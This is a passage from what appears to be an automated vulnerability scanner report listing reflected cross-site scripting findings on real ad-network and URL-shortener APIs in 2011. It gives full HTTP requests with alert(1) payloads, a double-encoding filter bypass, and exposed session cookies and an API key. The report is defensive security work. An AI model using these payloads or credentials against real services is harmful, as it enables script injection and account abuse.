Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:04:41 GMT
Content-Length: 392

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/g;44306;0-0;0;44377126;6-120/60;0/0/0;;~okv=;tile=3;pos=3_120x60;sz=120x60;akw=;!category=default;name=;title=;;21af0'-alert(1)-'f4b60843494=1;bsg=103028;bsg=103268;bsg=103666;bsg=103667;;~sscs=%3f">
...[SNIP]...

2.42. http://ad.doubleclick.net/adj/trb.latimes/hp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.latimes/hp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4dc1'-alert(1)-'a79b64de46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.latimes/hp;rs=10009;rs=10087;rs=D08734_70007;rs=D08734_70060;rs=D08734_70086;rs=D08734_70115;rs=D08734_72012;rs=D08734_72015;rs=D08734_72017;rs=D08734_72020;rs=D08734_72021;rs=D08734_72076;rs=D08734_72079;rs=D08734_72080;rs=D08734_72081;;ptype=sf;rg=ur;pos=T;dcopt=ist;sz=1x1;tile=1;u=http://www.latimes.com/;ord=83659565?&f4dc1'-alert(1)-'a79b64de46e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:02:57 GMT
Content-Length: 619

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/b;44306;0-0;0;12926859;31-1/1;0/0/0;u=http://www.latimes.com/;~okv=;rs=10009;rs=10087;rs=D08734_70007;rs=D087
...[SNIP]...
rs=D08734_72015;rs=D08734_72017;rs=D08734_72020;rs=D08734_72021;rs=D08734_72076;rs=D08734_72079;rs=D08734_72080;rs=D08734_72081;;ptype=sf;rg=ur;pos=T;dcopt=ist;sz=1x1;tile=1;u=http://www.latimes.com/;;f4dc1'-alert(1)-'a79b64de46e=1;~aopt=2/1/8866/1;~sscs=%3f">
...[SNIP]...

2.43. http://ad.doubleclick.net/adj/trb.latimes/hp [rs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.latimes/hp

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 317e6'%3balert(1)//ba95ca61ebb was submitted in the rs parameter. This input was echoed as 317e6';alert(1)//ba95ca61ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.latimes/hp;rs=317e6'%3balert(1)//ba95ca61ebb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:02:52 GMT
Expires: Mon, 09 May 2011 16:02:52 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/g;44306;0-0;0;12926859;11962-2000/2000;0/0/0;;~okv=;rs=317e6';alert(1)//ba95ca61ebb;~aopt=2/1/8866/1;~sscs=%3f">
...[SNIP]...

2.44. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19659"%3balert(1)//b5b374d2390 was submitted in the click parameter. This input was echoed as 19659";alert(1)//b5b374d2390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D19659"%3balert(1)//b5b374d2390 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:09 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=5117d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Dc68c268c1FJ7Hc38c1CFc24BScH1B9cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=558441&Cr=70012&D5=&S=&Cn=200&Pd=0&SID=5660A087C03345F2801ED49AE062E792&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956989&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:08 GMT
Connection: close
Content-Length: 4624

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
nVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=19659";alert(1)//b5b374d2390http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316736%26BT%5FSID%3D98462%26";var lf="clickTAG=http%3A%2F%2Fadclick%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBzwrqIh
...[SNIP]...

2.45. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54efa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fe3918f6da was submitted in the click parameter. This input was echoed as 54efa"><script>alert(1)</script>9fe3918f6da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the click request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D54efa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fe3918f6da HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:09 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=31364d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Dc68c268c1FJ7Hc38c1CFc2529cI727cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=597063&Cr=70729&D5=&S=&Cn=200&Pd=0&SID=1F5323DC3BCB4DBFAB2838CA2ED90920&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956989&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:08 GMT
Connection: close
Content-Length: 4674

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
nVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=54efa"><script>alert(1)</script>9fe3918f6dahttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316748%26BT%5FSID%3D98462%26" target="_blank">
...[SNIP]...

2.46. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb649"-alert(1)-"896d8cce72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D&eb649"-alert(1)-"896d8cce72=1 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:11 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=25409d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Fc68c268c1FJ7Hc38c1CFc2616cHU95cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=588069&Cr=71718&D5=&S=&Cn=200&Pd=0&SID=DE9EDE43240846CCA257E0223CD55B2C&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956991&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:10 GMT
Connection: close
Content-Length: 4626

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316740%26BT%5FSID%3D98462%26eb649"-alert(1)-"896d8cce72=1";var lf="clickTAG=http%3A%2F%2Fadclick%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS%5FfitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd
...[SNIP]...

2.47. http://api.bit.ly/v3/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6c71c<script>alert(1)</script>5513d8f2013 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/shorten?login=pkubasov&apiKey=R_22cc3d39e924b23ae1b9b38b5654ad54&format=json&longUrl=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com&callback=VM.callbackBitLy6c71c<script>alert(1)</script>5513d8f2013 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 16:06:22 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 281

VM.callbackBitLy6c71c<script>alert(1)</script>5513d8f2013({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com", "url": "http:\/\/vibrant.co\/eEajJV", "hash": "eEajJV", "global_hash": "au9vT
...[SNIP]...

2.48. http://api.bit.ly/v3/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 359f4<img%20src%3da%20onerror%3dalert(1)>01c0bac9b14 was submitted in the longUrl parameter. This input was echoed as 359f4<img src=a onerror=alert(1)>01c0bac9b14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v3/shorten?login=pkubasov&apiKey=R_22cc3d39e924b23ae1b9b38b5654ad54&format=json&longUrl=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com359f4<img%20src%3da%20onerror%3dalert(1)>01c0bac9b14&callback=VM.callbackBitLy HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 16:06:19 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 284

VM.callbackBitLy({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com359f4<img src=a onerror=alert(1)>01c0bac9b14", "url": "http:\/\/vibrant.co\/iUwWcP", "hash": "iUwWcP", "global_hash": "jZLsSy", "new_hash": 1 } })

2.49. http://api.collarity.com/collarity/cws/v3/uQry [appid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.collarity.com
Path:   /collarity/cws/v3/uQry

Issue detail

The value of the appid request parameter is copied into the application's response without encoding. The payload 44eb7<img%20src%3da%20onerror%3dalert(1)>d1e2071b996 was submitted in the appid parameter. This input was echoed as 44eb7<img src=a onerror=alert(1)>d1e2071b996 in the application's response. The reflection lands inside a double-quoted JSON string of a JSONP error body, and this response carries no Content-Type header at all, so how a browser that opens the URL directly treats the body is left to its MIME sniffing; whether the event handler fires should be re-tested in each target browser rather than assumed from the markup alone.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /collarity/cws/v3/uQry?callback=CLPH.handleUUID&appid=msnbc44eb7<img%20src%3da%20onerror%3dalert(1)>d1e2071b996&r=48252711119130251355679477564991 HTTP/1.1
Host: api.collarity.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: passby=surfer

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Date: Mon, 09 May 2011 16:03:18 GMT
Edge-control: bypass-cache, !no-store
Expires: 0
Pragma: no-cache
Content-Length: 127
Connection: keep-alive

CLPH.handleUUID({"details":"Unknown application id: msnbc44eb7<img src=a onerror=alert(1)>d1e2071b996","error":"Server error"})

2.50. http://api.collarity.com/collarity/cws/v3/uQry [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.collarity.com
Path:   /collarity/cws/v3/uQry

Issue detail

The value of the callback request parameter is copied into the application's response without encoding. The payload 8c6e5<script>alert(1)</script>3593c89ba7a was submitted in the callback parameter. This input was echoed unmodified in the application's response. The reflected value forms the callback function name of a JSONP body served as text/javascript: whenever this response is evaluated as script, whatever the callback parameter contains is parsed as code, which is the root cause. A browser that opens this URL directly does not hand a text/javascript body to its HTML parser, so the <script> markup shown here does not fire on direct navigation.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collarity/cws/v3/uQry?callback=CLPH.handleUUID8c6e5<script>alert(1)</script>3593c89ba7a&appid=msnbc&r=48252711119130251355679477564991 HTTP/1.1
Host: api.collarity.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: passby=surfer

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 09 May 2011 16:03:08 GMT
Edge-control: bypass-cache, !no-store
Edge-control: bypass-cache, !no-store
Expires: 0
P3P: CP="NON DSP COR NID IND NAV UNI INT STA"
Pragma: no-cache
Set-Cookie: cvti=QL_bDKVDwo0pCIjbiF-RAiQF6eDlmB_m5oZg_OjsZDY;Path=/;Domain=.collarity.com;Expires=Thu, 06-May-21 16:03:08 GMT
Content-Length: 127
Connection: keep-alive

CLPH.handleUUID8c6e5<script>alert(1)</script>3593c89ba7a({"hasbk":false,"token":"QL_bDKVDwo0pCIjbiF-RAiQF6eDlmB_m5oZg_OjsZDY"})

2.51. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 38fba<script>alert(1)</script>9c1155ffa67 was submitted in the callback parameter. This input was echoed unmodified in the application's response. The reflected value forms the callback function name of a JSONP body, and the response is served as text/html rather than as script, so a browser that opens this URL directly parses the reflected <script> tag as HTML and runs it in the api.tweetmeme.com origin.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com&callback=VM.c10623865538fba<script>alert(1)</script>9c1155ffa67 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
